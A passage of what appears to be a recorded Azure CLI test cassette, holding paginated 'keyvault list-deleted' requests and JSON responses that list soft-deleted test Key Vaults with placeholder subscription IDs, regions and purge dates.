,"tags":{},"deletionDate":"2020-03-20T18:05:43Z","scheduledPurgeDate":"2020-06-18T18:05:43Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/ygmanualkv","name":"ygmanualkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygmanual3/providers/Microsoft.KeyVault/vaults/ygmanualkv","location":"westus","tags":{},"deletionDate":"2020-03-20T17:20:39Z","scheduledPurgeDate":"2020-03-30T17:20:39Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-tj5mzneo7gaw2","name":"vault3-tj5mzneo7gaw2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_6gxte5ygnfmanlihyu44y324bv5syoanh6/providers/Microsoft.KeyVault/vaults/vault3-tj5mzneo7gaw2","location":"westcentralus","tags":{},"deletionDate":"2020-03-18T08:45:24Z","scheduledPurgeDate":"2020-06-16T08:45:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-6u3vwfyl5mol4","name":"vault4-6u3vwfyl5mol4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_tpzeowagmcydqg4nvr4gahyx3sh5v5eg3ohwv/providers/Microsoft.KeyVault/vaults/vault4-6u3vwfyl5mol4","location":"westcentralus","tags":{},"deletionDate":"2020-03-13T20:24:17Z","scheduledPurgeDate":"2020-06-11T20:24:17Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-wryxmcvvmlotu","name":"vault3-wryxmcvvmlotu","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_btjqcsgrlol7jcdkixrpogkneiakgs76zv/providers/Microsoft.KeyVault/vaults/vault3-wryxmcvvmlotu","location":"westcentralus","tags":{},"deletionDate":"2020-03-13T20:21:58Z","scheduledPurgeDate":"2020-06-11T20:21:58Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-6sp22inn3vz2z4","name":"vault-6sp22inn3vz2z4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_chch5fzdjnuuq7ixijijg5irsyfrgcaca2jwpqedjriodj/providers/Microsoft.KeyVault/vaults/vault-6sp22inn3vz2z4","location":"westcentralus","tags":{},"deletionDate":"2020-03-13T20:20:19Z","scheduledPurgeDate":"2020-06-11T20:20:19Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-727inrbmb3veo","name":"vault4-727inrbmb3veo","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_wbelg4cahhq62yyutsfkc4kquez6ezxxjncph/providers/Microsoft.KeyVault/vaults/vault4-727inrbmb3veo","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T20:40:53Z","scheduledPurgeDate":"2020-06-04T20:40:53Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZJRj6IwFIX%2fC5nM0yKlOjtiYiaOLbs4tg211egbQnGhCIaiApP578NM9k%2fsJvfh3JyTe5Mv590qVduss1Iba%2fZubZgUv5eYCr5Yy401s%2f40zcXMHOccldFJnVXZjKL%2bWqtRXJ0dcz2auM4uTVaVxgFHN%2f05eXZt95gCe5IkkR2peGzHRw8%2bwxR4Tx5wLnV1yxJVG4dkcV2ZKm1Gb6rbRteicRJVqEYl34t5iS6ZfRuSw%2fE5BK5ng2Hcxwejh4%2bVVuVc6u2Ob1eCS%2b4LvJUb6bG1LGSKApeIU0fy%2bM4QgVTs7wQtIEP%2blIhXTPPiFxd7GIIA0C9f%2b0vaDwqtXkO9QgzhjqLQ%2bmHt8Eb88xxa2ssxFRqSbxYSkJ5OKTj4YX%2fwiT4gCkJIEV1SHXRhHj8RcUBcBm2Y84HF6S%2bH%2f6UWLUPxmPQS0HzRk3w%2fYaiYMonvRGPIBMckJ1%2b16DjSgAvcMhx0DGmXIIqJWFgfH58%3d"}' headers: cache-control: - no-cache content-length: - '9562' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:25 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - c28dae73-4604-4ac5-9f9b-19239bd744e4 - 8450b7b7-2825-44ba-af77-51017e11c80b - 492cd685-e54e-4074-a0e2-ac85fb76b570 - 3a8e109a-2c70-4e3f-b8ab-5cbfdb595138 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZJRj6IwFIX%2FC5nM0yKlOjtiYiaOLbs4tg211egbQnGhCIaiApP578NM9k%2FsJvfh3JyTe5Mv590qVduss1Iba%2FZubZgUv5eYCr5Yy401s%2F40zcXMHOccldFJnVXZjKL%2BWqtRXJ0dcz2auM4uTVaVxgFHN%2F05eXZt95gCe5IkkR2peGzHRw8%2BwxR4Tx5wLnV1yxJVG4dkcV2ZKm1Gb6rbRteicRJVqEYl34t5iS6ZfRuSw%2FE5BK5ng2Hcxwejh4%2BVVuVc6u2Ob1eCS%2B4LvJUb6bG1LGSKApeIU0fy%2BM4QgVTs7wQtIEP%2BlIhXTPPiFxd7GIIA0C9f%2B0vaDwqtXkO9QgzhjqLQ%2BmHt8Eb88xxa2ssxFRqSbxYSkJ5OKTj4YX%2FwiT4gCkJIEV1SHXRhHj8RcUBcBm2Y84HF6S%2BH%2F6UWLUPxmPQS0HzRk3w%2FYaiYMonvRGPIBMckJ1%2B16DjSgAvcMhx0DGmXIIqJWFgfH58%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestmf4qrq3dwsxylaji6","name":"clitestmf4qrq3dwsxylaji6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgtnionk3ayvlloughf4no44tsolxl5m2lo6e3c45b6i32n57rarqxgxqk7rpf5m3lx/providers/Microsoft.KeyVault/vaults/clitestmf4qrq3dwsxylaji6","location":"southcentralus","tags":{},"deletionDate":"2020-01-21T07:31:05Z","scheduledPurgeDate":"2020-04-20T07:31:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestjcfgppyzgcuqqua7b","name":"clitestjcfgppyzgcuqqua7b","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgj23n4o5ajtbuc6hraxvnd5ovnup2snzwf6vvvw5gyuy4ck7uwndsdonqnqeggtie4/providers/Microsoft.KeyVault/vaults/clitestjcfgppyzgcuqqua7b","location":"southcentralus","tags":{},"deletionDate":"2020-01-21T06:57:47Z","scheduledPurgeDate":"2020-04-20T06:57:47Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/yugangwscu-kv","name":"yugangwscu-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwscu/providers/Microsoft.KeyVault/vaults/yugangwscu-kv","location":"southcentralus","tags":{},"deletionDate":"2020-01-06T17:11:21Z","scheduledPurgeDate":"2020-04-05T17:11:21Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest6grlmdctgn6eh3ndg","name":"clitest6grlmdctgn6eh3ndg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgn3xqrq2wqgbylloetwdwzxe22pojyvuyndrmeqhmykqa5ksewjqmg7ndqxqvjlr5h/providers/Microsoft.KeyVault/vaults/clitest6grlmdctgn6eh3ndg","location":"southcentralus","tags":{},"deletionDate":"2019-12-27T03:28:25Z","scheduledPurgeDate":"2020-03-26T03:28:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/jlkv0320","name":"jlkv0320","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg/providers/Microsoft.KeyVault/vaults/jlkv0320","location":"westus","tags":{},"deletionDate":"2020-03-20T15:11:54Z","scheduledPurgeDate":"2020-06-18T15:11:54Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-yjrtacg","name":"cli-test-kv-mgmt-yjrtacg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtkkjkiu6xhtctbunvip4phxbpyixzmoqfqb2yjy3wcr367zfvsga6e/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-yjrtacg","location":"westus","tags":{},"deletionDate":"2020-03-20T14:12:09Z","scheduledPurgeDate":"2020-06-18T14:12:09Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-e64u7hy","name":"cli-test-kv-mgmt-e64u7hy","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtptat2lwx5z6o763m6mdfwfa7fai7g2peguf73hlnpcnpagsrmxahw/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-e64u7hy","location":"westus","tags":{},"deletionDate":"2020-03-20T14:02:45Z","scheduledPurgeDate":"2020-06-18T14:02:45Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-hklrjf","name":"cli-test-kv-se-sd-hklrjf","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletef7rgkqek6t64cof7dkxhkrsd5ddh7pdw5fjcubo/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-hklrjf","location":"westus","tags":{},"deletionDate":"2020-03-19T15:04:05Z","scheduledPurgeDate":"2020-06-17T15:04:05Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-igkkko","name":"cli-test-kv-se-sd-igkkko","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deleteva4q4nt3xya4rxsvde6nl5cskxlbta4haeg35vl/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-igkkko","location":"westus","tags":{},"deletionDate":"2020-03-19T15:00:27Z","scheduledPurgeDate":"2020-06-17T15:00:27Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-fk7ukxyz5gvr5","name":"vault3-fk7ukxyz5gvr5","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_dcosc6hwc7jmleauz623earcgwqbf7mh6e/providers/Microsoft.KeyVault/vaults/vault3-fk7ukxyz5gvr5","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T20:38:23Z","scheduledPurgeDate":"2020-06-04T20:38:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-oqyezrprrfwmll","name":"vault-oqyezrprrfwmll","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_kg44lzn7shfh6cfq5yemlklqzok34sleluarrk4gsklusp/providers/Microsoft.KeyVault/vaults/vault-oqyezrprrfwmll","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T20:36:45Z","scheduledPurgeDate":"2020-06-04T20:36:45Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/xxj-jedi-2","name":"xxj-jedi-2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/xiaojianxu/providers/Microsoft.KeyVault/vaults/xxj-jedi-2","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T15:27:15Z","scheduledPurgeDate":"2020-06-04T15:27:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1564","name":"vault1564","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1564/providers/Microsoft.KeyVault/vaults/vault1564","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T14:49:41Z","scheduledPurgeDate":"2020-06-04T14:49:41Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1562","name":"vault1562","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1562/providers/Microsoft.KeyVault/vaults/vault1562","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T14:48:09Z","scheduledPurgeDate":"2020-06-04T14:48:09Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZLRbqMwEEX%2fBVX7VIINyTZEiqo0dnbbjY1w7ETkjRjDgglEmLTEVf%2b9aB%2f2H1rpvszV1Yzm6rw7jRr6bdlo4yzenV0k%2bO81ppyttmLnLJy%2ffX8xC887p01aqLNq%2bklqr52ayPbsmevJyK689GXbGA%2bcYP5z%2bgBdeMqBO82y1E2VDFx5Cv0HPwfhLATepWtfy0x1xiOl7FrT5v3kj7rt02vde5mqVa%2byf4N5TC%2bl%2bzomx%2bVLH8DQBaPgjzujx4utVs1S6P2B7V84E2zD8V7sRBhtRS1y9AwJL24UFVNi4xlFK0A5Cag9ziNMfzEhRn91Y5W0FAlI8AtmVQIpwoDgzTri9RMTiXPvHPCOf%2fkeBmqTgCAZkGp1I1URUHScM0RmrIrfqCUgQtma4uQttgUgnGIKCIitBBF%2f9uP%2fPXwXLIYIyREJORAU%2bxHXgKJ6zvgRMU7g%2bC6ItRgoZojpzYZoAYgtLMPYpzqxTMfOx8cn"}' headers: cache-control: - no-cache content-length: - '8512' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:27 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 8b0c4e96-1706-419f-8e73-7041d733ae48 - f766a244-84c7-4138-8132-b675168ce7f2 - 63e85190-e5a8-4de0-9eab-a1de919fec98 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZLRbqMwEEX%2FBVX7VIINyTZEiqo0dnbbjY1w7ETkjRjDgglEmLTEVf%2B9aB%2F2H1rpvszV1Yzm6rw7jRr6bdlo4yzenV0k%2BO81ppyttmLnLJy%2FfX8xC887p01aqLNq%2Bklqr52ayPbsmevJyK689GXbGA%2BcYP5z%2BgBdeMqBO82y1E2VDFx5Cv0HPwfhLATepWtfy0x1xiOl7FrT5v3kj7rt02vde5mqVa%2Byf4N5TC%2Bl%2Bzomx%2BVLH8DQBaPgjzujx4utVs1S6P2B7V84E2zD8V7sRBhtRS1y9AwJL24UFVNi4xlFK0A5Cag9ziNMfzEhRn91Y5W0FAlI8AtmVQIpwoDgzTri9RMTiXPvHPCOf%2FkeBmqTgCAZkGp1I1URUHScM0RmrIrfqCUgQtma4uQttgUgnGIKCIitBBF%2F9uP%2FPXwXLIYIyREJORAU%2BxHXgKJ6zvgRMU7g%2BC6ItRgoZojpzYZoAYgtLMPYpzqxTMfOx8cn response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-y24qpy","name":"cli-test-kv-se-sd-y24qpy","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletedfl3eyuy4hlsproxdrwblb4qzjcstziargftq7n/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-y24qpy","location":"westus","tags":{},"deletionDate":"2020-03-19T14:54:51Z","scheduledPurgeDate":"2020-06-17T14:54:51Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-6bjex7t","name":"cli-test-kv-mgmt-6bjex7t","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtopoz3qwflobcgcbq2zbbe4gao3wzmmrfmb3ktmuzrpzco5zyaygej/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-6bjex7t","location":"westus","tags":{},"deletionDate":"2020-03-19T14:01:42Z","scheduledPurgeDate":"2020-06-17T14:01:42Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-3gsfils","name":"cli-test-kv-mgmt-3gsfils","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtcaxzggjwguqpnmxrwbv6a23a6y5hxkt3ch7w67vrchfhzejd7tdep/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-3gsfils","location":"westus","tags":{},"deletionDate":"2020-03-19T13:47:18Z","scheduledPurgeDate":"2020-06-17T13:47:18Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-6kqbhzl","name":"cli-test-kv-mgmt-6kqbhzl","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt6jkdiolrufign6rd6733lbdmrd2vjmvvchhdmv6riaspssqrtmlzf/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-6kqbhzl","location":"westus","tags":{},"deletionDate":"2020-03-19T13:32:14Z","scheduledPurgeDate":"2020-06-17T13:32:14Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-q53oeeg","name":"cli-test-kv-mgmt-q53oeeg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtzmdpxfqbv2a7pk3hklvurzjynlu46vs2tjld2lw6hmrtlcf5q7xtx/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-q53oeeg","location":"westus","tags":{},"deletionDate":"2020-03-19T13:01:15Z","scheduledPurgeDate":"2020-06-17T13:01:15Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1566","name":"vault1566","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1566/providers/Microsoft.KeyVault/vaults/vault1566","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T14:46:49Z","scheduledPurgeDate":"2020-06-04T14:46:49Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1561","name":"vault1561","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1561/providers/Microsoft.KeyVault/vaults/vault1561","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T14:30:51Z","scheduledPurgeDate":"2020-06-04T14:30:51Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1563","name":"vault1563","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1563/providers/Microsoft.KeyVault/vaults/vault1563","location":"westcentralus","tags":{},"deletionDate":"2020-03-06T14:14:37Z","scheduledPurgeDate":"2020-06-04T14:14:37Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/ygtestacr","name":"ygtestacr","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygtest/providers/Microsoft.KeyVault/vaults/ygtestacr","location":"westcentralus","tags":{},"deletionDate":"2020-03-05T14:11:17Z","scheduledPurgeDate":"2020-06-03T14:11:17Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-7wamidrnibfaa","name":"vault4-7wamidrnibfaa","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_ujt5vzns5h676jh7ddu3xebmibci36wtpk5hj/providers/Microsoft.KeyVault/vaults/vault4-7wamidrnibfaa","location":"westcentralus","tags":{},"deletionDate":"2020-02-28T23:37:12Z","scheduledPurgeDate":"2020-05-28T23:37:12Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDdboJAEIXfhTS9KvLbKiamsYINVoaw7mJ6CctCAQXDrq2s8d279S2azEnmZCZzMt9V69hFbOuu5dr8qu2DHSY7ba59CXHic8M4Zl1WsSPrxCST54FNaH80%2bDnndKhPou47bpi5Vb64U0u38tLU3aLI9IxRR6e5Z0%2ft0vSePdM4Df13XbCBG1FNh573pZh8sDHNzgdhFOzABCvuhr9mp1r%2fVpvq%2bMI2LU83VVmPD7xViX3LugVp0z1KNxgRtMZBSnbEi7fkQEo%2ftCJcXUB%2bOiDbEfxKQlPZgNczMAMbYfATGbnI36xUN8YkVLPQQT5xoElcROAtaYj2dOewCgCj5fb%2f44hxZIOkSqEETH%2fUW7NEJgoNvUTN2o9xoXAEEtpwRA28RzgZoYmU%2f0O11G63Xw%3d%3d"}' headers: cache-control: - no-cache content-length: - '6058' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:27 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - cf65a5ef-24c0-40ed-9b37-c325c089dbd8 - 14034541-e125-4061-93c4-f23c7955468e - dc4f5bd2-d86d-495a-bc1a-a14f44956a49 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDdboJAEIXfhTS9KvLbKiamsYINVoaw7mJ6CctCAQXDrq2s8d279S2azEnmZCZzMt9V69hFbOuu5dr8qu2DHSY7ba59CXHic8M4Zl1WsSPrxCST54FNaH80%2BDnndKhPou47bpi5Vb64U0u38tLU3aLI9IxRR6e5Z0%2Ft0vSePdM4Df13XbCBG1FNh573pZh8sDHNzgdhFOzABCvuhr9mp1r%2FVpvq%2BMI2LU83VVmPD7xViX3LugVp0z1KNxgRtMZBSnbEi7fkQEo%2FtCJcXUB%2BOiDbEfxKQlPZgNczMAMbYfATGbnI36xUN8YkVLPQQT5xoElcROAtaYj2dOewCgCj5fb%2F44hxZIOkSqEETH%2FUW7NEJgoNvUTN2o9xoXAEEtpwRA28RzgZoYmU%2F0O11G63Xw%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-rixhr4t","name":"cli-test-kv-mgmt-rixhr4t","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtcpfgb2dgfbee76w4qt53hurmakwxf26hlwt75xfp53l6z5anmohzq/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-rixhr4t","location":"westus","tags":{},"deletionDate":"2020-03-19T12:29:58Z","scheduledPurgeDate":"2020-06-17T12:29:58Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-kjyr374","name":"cli-test-kv-mgmt-kjyr374","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt3hi3leqg4msq646qfdb5yr6wx3ggbgyyoxmvd33jgw6tfcchfbdgk/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-kjyr374","location":"westus","tags":{},"deletionDate":"2020-03-19T10:01:58Z","scheduledPurgeDate":"2020-06-17T10:01:58Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-qlzc25q","name":"cli-test-kv-mgmt-qlzc25q","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtdj64skbite73czm625jutraoikqwtmjegg3go3zz2qnnxyjupfbxs/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-qlzc25q","location":"westus","tags":{},"deletionDate":"2020-03-19T09:44:33Z","scheduledPurgeDate":"2020-06-17T09:44:33Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaulttbjoh","name":"vaulttbjoh","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_encryptionlmn5v5qxclkzjfsuzg3fazp2ttldzipvkii7keh7wxmdtheuo55/providers/Microsoft.KeyVault/vaults/vaulttbjoh","location":"westu